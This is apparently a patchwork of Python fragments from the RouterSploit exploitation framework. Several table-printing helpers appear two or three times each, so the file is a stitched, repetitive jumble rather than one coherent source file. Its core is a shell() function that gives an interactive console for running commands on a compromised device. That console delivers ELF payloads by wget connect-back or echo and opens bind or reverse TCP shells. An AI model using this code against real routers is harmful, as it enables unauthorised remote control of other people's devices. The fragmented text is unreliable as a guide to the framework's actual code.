def print_services(self):
headers = ("Handles", "Service > Characteristics", "Properties",
"Data")
services = self.enumerate_services()
if services:
print_table(headers, *services, max_column_length=70, extra_fill=3)
def _show_encoders(self, *args, **kwargs):
if issubclass(self.current_module.__class__, BasePayload):
encoders = self.current_module.get_encoders()
if encoders:
headers = ("Encoder", "Name", "Description")
print_table(headers, *encoders, max_column_length=100)
return
print_error("No encoders available")
def _show_encoders(self, *args, **kwargs):
if issubclass(self.current_module.__class__, BasePayload):
encoders = self.current_module.get_encoders()
if encoders:
headers = ("Encoder", "Name", "Description")
print_table(headers, *encoders, max_column_length=100)
return
print_error("No encoders available")
def _show_options(self, *args, **kwargs):
target_names = ["target", "port", "ssl", "rhost", "rport", "lhost", "lport"]
target_opts = [opt for opt in self.current_module.options if opt in target_names]
module_opts = [opt for opt in self.current_module.options if opt not in target_opts]
headers = ("Name", "Current settings", "Description")
print_info("\nTarget options:")
print_table(headers, *self.get_opts(*target_opts))
if module_opts:
print_info("\nModule options:")
print_table(headers, *self.get_opts(*module_opts))
print_info()
def _show_options(self, *args, **kwargs):
target_names = ["target", "port", "ssl", "rhost", "rport", "lhost", "lport"]
target_opts = [opt for opt in self.current_module.options if opt in target_names]
module_opts = [opt for opt in self.current_module.options if opt not in target_opts]
headers = ("Name", "Current settings", "Description")
print_info("\nTarget options:")
print_table(headers, *self.get_opts(*target_opts))
if module_opts:
print_info("\nModule options:")
print_table(headers, *self.get_opts(*module_opts))
print_info()
def print_info(self):
headers = (color_blue("{} ({} dBm)").format(self.addr, self.rssi), "")
if self.connectable:
allow_connection = color_green(str(self.connectable))
else:
allow_connection = color_red(str(self.connectable))
data = [
("Vendor", self.vendor),
("Allow Connections", allow_connection),
]
for d in self.data:
data.append((d[0], d[1]))
print_table(headers, *data, max_column_length=70, extra_fill=3)
def print_info(self):
headers = (color_blue("{} ({} dBm)").format(self.addr, self.rssi), "")
if self.connectable:
allow_connection = color_green(str(self.connectable))
else:
allow_connection = color_red(str(self.connectable))
data = [
("Vendor", self.vendor),
("Allow Connections", allow_connection),
]
for d in self.data:
data.append((d[0], d[1]))
print_table(headers, *data, max_column_length=70, extra_fill=3)
def _show_wordlists(self, *args, **kwargs):
headers = ("Wordlist", "Path")
wordlists = [(f, "file://{}/{}".format(WORDLISTS_DIR, f))
for f in os.listdir(WORDLISTS_DIR) if f.endswith(".txt")]
print_table(headers, *wordlists, max_column_length=100)
def shell(exploit, architecture="", method="", payloads=None, **params):
available_payloads = {}
payload = None
options = []
if architecture and method:
path = "routersploit/modules/payloads/{}/".format(architecture)
# get all payloads for given architecture
all_payloads = [f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"]
payload_path = path.replace("/", ".")
for p in all_payloads:
module = getattr(importlib.import_module("{}{}".format(payload_path, p)), 'Exploit')
# if method/arch is cmd then filter out payloads
if method is "cmd":
if getattr(module, "cmd") in payloads:
available_payloads[p] = module
else:
available_payloads[p] = module
print_info()
print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
print_info()
while True:
while not printer_queue.empty():
pass
if payload is None:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
else:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Exploit__info__["name"])
cmd = input(cmd_str)
if cmd in ["quit", "exit"]:
return
elif cmd == "show payloads":
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
print_status("Available payloads:")
headers = ("Payload", "Name", "Description")
data = []
for p in available_payloads.keys():
data.append((p, available_payloads[p]._Exploit__info__["name"], available_payloads[p]._Exploit__info__["description"]))
print_table(headers, *data)
elif cmd.startswith("set payload "):
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
c = cmd.split(" ")
if c[2] in available_payloads.keys():
payload = available_payloads[c[2]]()
options = []
for option in payload.exploit_attributes.keys():
if option not in ["output", "filepath"]:
options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]])
if payload.handler == "bind_tcp":
options.append(["rhost", exploit.target, "Target IP address"])
if method == "wget":
options.append(["lhost", "", "Connect-back IP address for wget"])
options.append(["lport", 4545, "Connect-back Port for wget"])
else:
print_error("Payload not available")
elif payload is not None:
if cmd == "show options":
headers = ("Name", "Current settings", "Description")
print_info('\nPayload Options:')
print_table(headers, *options)
print_info()
elif cmd.startswith("set "):
c = cmd.split(" ")
if len(c) != 3:
print_error("set <option> <value>")
else:
for option in options:
if option[0] == c[1]:
try:
setattr(payload, c[1], c[2])
except Exception:
print_error("Invalid value for {}".format(c[1]))
break
option[1] = c[2]
print_info("{} => {}".format(c[1], c[2]))
elif cmd == "run":
data = payload.generate()
if method == "wget":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options, **params)
if communication.wget() is False:
print_error("Exploit failed to transfer payload")
continue
elif method == "echo":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options, **params)
communication.echo()
elif method == "cmd":
params["exec_binary"] = data
communication = Communication(exploit, "", options, **params)
if payload.handler == "bind_tcp":
communication.bind_tcp()
elif payload.handler == "reverse_tcp":
communication.reverse_tcp()
elif cmd == "back":
payload = None
else:
print_status("Executing '{}' on the device...".format(cmd))
print_info(exploit.execute(cmd))
def _show_wordlists(self, *args, **kwargs):
headers = ("Wordlist", "Path")
wordlists = [(f, "file://{}/{}".format(WORDLISTS_DIR, f)) for f in os.listdir(WORDLISTS_DIR) if f.endswith(".txt")]
print_table(headers, *wordlists, max_column_length=100)
def print_services(self):
headers = ("Handles", "Service > Characteristics", "Properties", "Data")
services = self.enumerate_services()
if services:
print_table(headers, *services, max_column_length=70, extra_fill=3)
